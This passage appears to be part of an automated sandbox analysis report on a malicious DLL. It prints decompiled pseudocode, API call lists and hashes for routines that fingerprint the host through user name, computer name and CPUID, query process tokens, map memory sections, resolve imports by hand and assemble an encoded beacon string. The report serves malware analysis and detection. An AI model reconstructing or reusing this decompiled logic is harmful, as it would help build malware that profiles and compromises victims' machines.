					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x6d471144
0x6d47114d
0x6d471151
0x6d471157
0x6d47115c
0x6d471161
0x6d471164
0x6d471167
0x6d47116c
0x6d47116d
0x6d471170
0x6d47117b
0x6d471182
0x6d471186
0x6d471188
0x6d471189
0x6d47118c
0x6d471191
0x6d47119b
0x6d47119d
0x6d47119d
0x6d4711b1
0x6d4711b7
0x6d4711bb
0x6d47120b
0x6d4711bd
0x6d4711c6
0x6d4711dc
0x6d4711e4
0x6d4711f6
0x6d4711fa
0x00000000
0x00000000
0x6d4711e6
0x6d4711e9
0x6d4711ee
0x6d4711f0
0x6d4711f0
0x6d4711d1
0x6d4711d3
0x6d4711fc
0x6d4711fd
0x6d4711fd
0x6d4711c6
0x6d471213

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6D47156A,0000000A,?,?), ref: 6D471151
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6D471167
_snwprintf.NTDLL ref: 6D47118C
CreateFileMappingW.KERNELBASE(000000FF,6D4741C0,00000004,00000000,?,?), ref: 6D4711B1
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D47156A,0000000A,?), ref: 6D4711C8
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6D4711DC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D47156A,0000000A,?), ref: 6D4711F4
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6D47156A,0000000A), ref: 6D4711FD
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D47156A,0000000A,?), ref: 6D471205

Memory Dump Source

Source File: 00000000.00000002.924973104.000000006D471000.00000020.00020000.sdmp, Offset: 6D470000, based on PE: true

Associated: 00000000.00000002.924964633.000000006D470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924982992.000000006D473000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924990837.000000006D475000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.924998738.000000006D476000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d470000_loaddll32.jbxd

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 1d3583a457fc1a726c46e43d2704d55dae5a7b82ee03b36ec73dd6b106a5d4b8
Instruction ID: dfba091919a833e23dc22f871ede6fe03c10ab6aba694ac89a873fe75a7f357d
Opcode Fuzzy Hash: 1d3583a457fc1a726c46e43d2704d55dae5a7b82ee03b36ec73dd6b106a5d4b8
Instruction Fuzzy Hash: 6C216DB2500158ABDB21AF98CC88FEE7BB8FB4A350F214525F625EA244D730DD45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00DE4454, Relevance: 12.1, APIs: 8, Instructions: 102
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00DE4454(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0xdea2c8; // 0xbd092303
					_v12 = _t59;
				}
				_t64 = _t69;
				E00DE143F( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0xdea2d0 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0xdea290, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E00DE283A(_v8 + _v8, _t63);
							}
							HeapFree( *0xdea290, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0xdea290, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E00DE283A(_v8 + _v8, _t63);
						}
						HeapFree( *0xdea290, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}

0x00de4454
0x00de445c
0x00de4462
0x00de4465
0x00de4468
0x00de446a
0x00de446f
0x00de446f
0x00de4475
0x00de4477
0x00de4484
0x00de44e5
0x00de4486
0x00de448b
0x00de4491
0x00de4496
0x00de44a4
0x00de44a8
0x00de44b7
0x00de44be
0x00de44c5
0x00de44c5
0x00de44d0
0x00de44d0
0x00de44a8
0x00de4496
0x00de44e7
0x00de44ed
0x00de44f7
0x00de44f9
0x00de44fe
0x00de450d
0x00de4511
0x00de451c
0x00de4523
0x00de452a
0x00de452a
0x00de4536
0x00de4536
0x00de4511
0x00de453f
0x00de4541
0x00de4544
0x00de4546
0x00de4549
0x00de454c
0x00de4556
0x00de455a
0x00de455e

APIs

GetUserNameW.ADVAPI32(00000000,00DE55CE), ref: 00DE448B
RtlAllocateHeap.NTDLL(00000000,00DE55CE), ref: 00DE44A2
GetUserNameW.ADVAPI32(00000000,00DE55CE), ref: 00DE44AF
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00DE55CE,?,?,?,?,?,00DE6BD8,?,00000001), ref: 00DE44D0
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00DE44F7
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00DE450B
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00DE4518
HeapFree.KERNEL32(00000000,00000000), ref: 00DE4536

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: 8a2372d0734f0cc6a4e760f3c4b3be8b6f3d4cd657911714234089e6a7138f6a
Instruction ID: e6d022c769caeea96d15e6da76987f5979cd47b075c7a9825393cc114b5b2de0
Opcode Fuzzy Hash: 8a2372d0734f0cc6a4e760f3c4b3be8b6f3d4cd657911714234089e6a7138f6a
Instruction Fuzzy Hash: 56312A72A0028AAFDB11EFAADCC1B6EB7F9FB44310F554429E505DB260D771EE009B21

Uniqueness

Uniqueness Score: -1.00%

Function 00DE2D06, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E00DE2D06(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E00DE6837(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E00DE50CA(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x00de2d13
0x00de2d14
0x00de2d15
0x00de2d16
0x00de2d17
0x00de2d1b
0x00de2d22
0x00de2d31
0x00de2d34
0x00de2d37
0x00de2d3e
0x00de2d41
0x00de2d44
0x00de2d47
0x00de2d4a
0x00de2d55
0x00de2d57
0x00de2d60
0x00de2d68
0x00de2d6a
0x00de2d7c
0x00de2d86
0x00de2d8a
0x00de2d99
0x00de2d9d
0x00de2da6
0x00de2dae
0x00de2dae
0x00de2db0
0x00de2db0
0x00de2db8
0x00de2dbe
0x00de2dc2
0x00de2dc2
0x00de2dcd

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00DE2D4D
NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 00DE2D60
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00DE2D7C

Part of subcall function 00DE6837: RtlAllocateHeap.NTDLL(00000000,00000000,00DE4197), ref: 00DE6843

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00DE2D99
memcpy.NTDLL(00000000,00000000,0000001C), ref: 00DE2DA6
NtClose.NTDLL(00000000), ref: 00DE2DB8
NtClose.NTDLL(00000000), ref: 00DE2DC2

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 2c3d230a5a41a786f28386a89bfe79081651b28db266c681fe09758013e571f0
Instruction ID: 54bb801034f74d03135d7f02797f4d2447cf1dbe416ca3a737044cf3785b1705
Opcode Fuzzy Hash: 2c3d230a5a41a786f28386a89bfe79081651b28db266c681fe09758013e571f0
Instruction Fuzzy Hash: D62105B2900258BBDB01AF95CC85DDEBFBDEF08750F104062FA04EA260D7718A409BF0

Uniqueness

Uniqueness Score: -1.00%

Function 6D48DCB0, Relevance: 8.3, APIs: 2, Strings: 2, Instructions: 1260COMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(6D4A4870,?,00000646), ref: 6D48DE81

Strings

e, xrefs: 6D48E0E8
w, xrefs: 6D48E07C

Memory Dump Source

Source File: 00000000.00000002.925010654.000000006D47E000.00000020.00020000.sdmp, Offset: 6D47E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d47e000_loaddll32.jbxd

Similarity

API ID: EnvironmentVariable
String ID: e$w
API String ID: 1431749950-2396313056
Opcode ID: 8dd1e0995d8aa823e4a6845313fcea10cdcac69374076553ae5706c8d66440cd
Instruction ID: edc7a5b78cdc0b76825eda0e138f996e511ddd2b484e78d032089e8d8adb3513
Opcode Fuzzy Hash: 8dd1e0995d8aa823e4a6845313fcea10cdcac69374076553ae5706c8d66440cd
Instruction Fuzzy Hash: 7CC27A71A082518FCB04EF28C594B6ABBF1BB9A344F594A2EE485D7382D771DC05CF86

Uniqueness

Uniqueness Score: -1.00%

Function 6D471B9C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E6D471B9C(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E6D471EC7(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x6d471ba5
0x6d471bac
0x6d471bad
0x6d471bae
0x6d471baf
0x6d471bb0
0x6d471bc1
0x6d471bc5
0x6d471bd9
0x6d471bdc
0x6d471bdf
0x6d471be6
0x6d471be9
0x6d471bf0
0x6d471bf3
0x6d471bf6
0x6d471bf9
0x6d471bfe
0x6d471c39
0x6d471c00
0x6d471c03
0x6d471c09
0x6d471c0e
0x6d471c12
0x6d471c30
0x6d471c14
0x6d471c1b
0x6d471c29
0x6d471c29
0x6d471c12
0x6d471c41

APIs

NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,?), ref: 6D471BF9

Part of subcall function 6D471EC7: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6D471C0E,00000002,00000000,?,?,00000000,?,?,6D471C0E,00000000), ref: 6D471EF4

memset.NTDLL ref: 6D471C1B

Strings

@, xrefs: 6D471BE9

Memory Dump Source

Source File: 00000000.00000002.924973104.000000006D471000.00000020.00020000.sdmp, Offset: 6D470000, based on PE: true

Associated: 00000000.00000002.924964633.000000006D470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924982992.000000006D473000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924990837.000000006D475000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.924998738.000000006D476000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d470000_loaddll32.jbxd

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 4d7eee9f11a7039b7ba48ef3c3db40ff58bda86e38dd00c02ef6a9748d42a3ba
Instruction ID: deaf7c2744093908045725f38cee0bed8e7ccf28c531c95d9ed6cdd716f93142
Opcode Fuzzy Hash: 4d7eee9f11a7039b7ba48ef3c3db40ff58bda86e38dd00c02ef6a9748d42a3ba
Instruction Fuzzy Hash: C221F9B2D00209AFDB11CFA9C8849DEFBB9EB48354F108829E615F3210D7359A458FA5

Uniqueness

Uniqueness Score: -1.00%

Function 6D471E8A, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E6D471E8A(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}

0x6d471e8e
0x6d471e9f
0x6d471ea7
0x6d471ea9
0x6d471ebc
0x6d471ebc
0x6d471ec6

APIs

GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,6D471B27,?,6D471CE6,?,00000000,00000000,?,?,?,6D471CE6), ref: 6D471E9F
GetSystemDefaultUILanguage.KERNEL32(?,?,6D471B27,?,6D471CE6,?,00000000,00000000,?,?,?,6D471CE6), ref: 6D471EA9
VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,6D471B27,?,6D471CE6,?,00000000,00000000,?,?,?,6D471CE6), ref: 6D471EBC

Memory Dump Source

Source File: 00000000.00000002.924973104.000000006D471000.00000020.00020000.sdmp, Offset: 6D470000, based on PE: true

Associated: 00000000.00000002.924964633.000000006D470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924982992.000000006D473000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924990837.000000006D475000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.924998738.000000006D476000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d470000_loaddll32.jbxd

Similarity

API ID: Language$DefaultInfoLocaleNameSystem
String ID:
API String ID: 3724080410-0
Opcode ID: 06fba8438be295163ca58caea2f2a9c18dc5625adab0d28855553d7963c2ae3b
Instruction ID: d536ca361ff50bc8c751eb956a2b5d918369f653739b1c1205475c9095fe2a26
Opcode Fuzzy Hash: 06fba8438be295163ca58caea2f2a9c18dc5625adab0d28855553d7963c2ae3b
Instruction Fuzzy Hash: 7BE04F64640249F6EB10EBA18D0AFBD72B8AB0170AF500088FB51E61C0D7B4DE08A769

Uniqueness

Uniqueness Score: -1.00%

Function 6D471F7C, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D471F7C(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6d4741cc;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x6d471f7c
0x6d471f85
0x6d471f8a
0x6d471f90
0x6d471f99
0x6d471f9f
0x6d471fa1
0x6d471fa4
0x6d471fa9
0x6d471fb0
0x6d471fb0
0x6d471fb4
0x6d471fbc
0x6d471fbf
0x00000000
0x00000000
0x6d471fc5
0x6d471fcf
0x6d471fd1
0x6d471fd4
0x6d471fd7
0x6d471fdb
0x6d471fe3
0x6d471fe5
0x6d471fe8
0x6d472050
0x6d472050
0x6d472054
0x00000000
0x00000000
0x6d471fed
0x6d471ff3
0x6d471ff5
0x6d472008
0x6d47200b
0x6d47200b
0x6d47200b
0x6d47200f
0x6d471ff7
0x6d471ff7
0x6d471fff
0x6d472001
0x00000000
0x00000000
0x00000000
0x00000000
0x6d472001
0x6d471fef
0x6d471fef
0x6d472003
0x6d472003
0x6d472003
0x6d472012
0x6d472015
0x6d472017
0x6d47201e
0x6d472019
0x6d472019
0x6d472019
0x6d472026
0x6d47202c
0x6d47202e
0x6d47205e
0x6d472030
0x6d472030
0x6d472033
0x6d472035
0x6d47203d
0x6d47203d
0x6d472042
0x6d472044
0x6d47204b
0x6d47204d
0x6d47204d
0x6d47204d
0x00000000
0x6d47204d
0x00000000
0x6d47202e
0x6d471fdd
0x6d471fdf
0x6d471fe1
0x00000000
0x00000000
0x6d471fe1
0x6d472061
0x6d472061
0x6d472068
0x6d47206d
0x00000000
0x00000000
0x6d472073
0x6d47207e
0x00000000
0x6d47207e
0x6d472075
0x6d472075
0x6d47207b
0x00000000
0x6d47207b
0x6d471fa9
0x6d47207f
0x6d472084

APIs

LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6D471FB4
GetProcAddress.KERNEL32(?,00000000), ref: 6D472026

Memory Dump Source

Source File: 00000000.00000002.924973104.000000006D471000.00000020.00020000.sdmp, Offset: 6D470000, based on PE: true

Associated: 00000000.00000002.924964633.000000006D470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924982992.000000006D473000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924990837.000000006D475000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.924998738.000000006D476000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d470000_loaddll32.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 24778a5caa5a08d3cfa67190aafad328683c87a58b2bb441c38982266f4756b2
Instruction ID: 586cebf2b889a99c28dd48eebcd02ff7d4a40f15d79c69335ff63360bcfc861c
Opcode Fuzzy Hash: 24778a5caa5a08d3cfa67190aafad328683c87a58b2bb441c38982266f4756b2
Instruction Fuzzy Hash: CC31E071A0025A9FDB25CFA9C884FAEB7F8BB05344B24806AD955E7344EB70DE45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6D471EC7, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6D471EC7(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x6d471ed9
0x6d471edf
0x6d471eed
0x6d471ef4
0x6d471ef9
0x6d471eff
0x00000000
0x6d471f00
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6D471C0E,00000002,00000000,?,?,00000000,?,?,6D471C0E,00000000), ref: 6D471EF4

Memory Dump Source

Source File: 00000000.00000002.924973104.000000006D471000.00000020.00020000.sdmp, Offset: 6D470000, based on PE: true

Associated: 00000000.00000002.924964633.000000006D470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924982992.000000006D473000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924990837.000000006D475000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.924998738.000000006D476000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d470000_loaddll32.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 402d9b5c6899564e7ed25eef13ec5fb56d5e545477e7908495842d4060a4af91
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 9AF01CB690420CBFEB119FA9CC85C9FBBBDEB44394B108939F652E1090D6309E088A60

Uniqueness

Uniqueness Score: -1.00%

Function 00DE46D1, Relevance: 33.3, APIs: 22, Instructions: 262
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00DE46D1(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t88;
				void* _t91;
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t102;
				void* _t107;
				intOrPtr _t111;
				signed int _t115;
				char** _t117;
				int _t120;
				signed int _t122;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr _t132;
				intOrPtr _t135;
				int _t138;
				intOrPtr _t139;
				int _t142;
				void* _t143;
				void* _t144;
				void* _t154;
				int _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				intOrPtr _t161;
				void* _t163;
				long _t167;
				intOrPtr* _t168;
				intOrPtr* _t171;
				void* _t172;
				void* _t174;
				void* _t175;
				void* _t180;

				_t154 = __edx;
				_t144 = __ecx;
				_t63 = __eax;
				_t143 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0xdea018; // 0x5a1b6391
				asm("bswap eax");
				_t65 =  *0xdea014; // 0x5cb11ae7
				asm("bswap eax");
				_t66 =  *0xdea010; // 0x15dc9586
				asm("bswap eax");
				_t67 =  *0xdea00c; // 0x67522d90
				asm("bswap eax");
				_t68 =  *0xdea2d4; // 0x2f2d5a8
				_t3 = _t68 + 0xdeb613; // 0x74666f73
				_t157 = wsprintfA(_t143, _t3, 3, 0x3d15c, _t67, _t66, _t65, _t64,  *0xdea02c,  *0xdea004, _t63);
				_t71 = E00DE6A09();
				_t72 =  *0xdea2d4; // 0x2f2d5a8
				_t4 = _t72 + 0xdeb653; // 0x74707526
				_t75 = wsprintfA(_t157 + _t143, _t4, _t71);
				_t174 = _t172 + 0x38;
				_t158 = _t157 + _t75;
				if(_a8 != 0) {
					_t139 =  *0xdea2d4; // 0x2f2d5a8
					_t8 = _t139 + 0xdeb65e; // 0x732526
					_t142 = wsprintfA(_t158 + _t143, _t8, _a8);
					_t174 = _t174 + 0xc;
					_t158 = _t158 + _t142;
				}
				_t76 = E00DE5040(_t144);
				_t77 =  *0xdea2d4; // 0x2f2d5a8
				_t10 = _t77 + 0xdeb302; // 0x6d697426
				_t159 = _t158 + wsprintfA(_t158 + _t143, _t10, _t76, _t154);
				_t81 =  *0xdea2d4; // 0x2f2d5a8
				_t12 = _t81 + 0xdeb7aa; // 0x3d18d52
				_t180 = _a4 - _t12;
				_t14 = _t81 + 0xdeb2d7; // 0x74636126
				_t156 = 0 | _t180 == 0x00000000;
				_t160 = _t159 + wsprintfA(_t159 + _t143, _t14, _t180 == 0);
				_t85 =  *0xdea31c; // 0x3d195e0
				_t175 = _t174 + 0x1c;
				if(_t85 != 0) {
					_t135 =  *0xdea2d4; // 0x2f2d5a8
					_t18 = _t135 + 0xdeb8da; // 0x3d736f26
					_t138 = wsprintfA(_t160 + _t143, _t18, _t85);
					_t175 = _t175 + 0xc;
					_t160 = _t160 + _t138;
				}
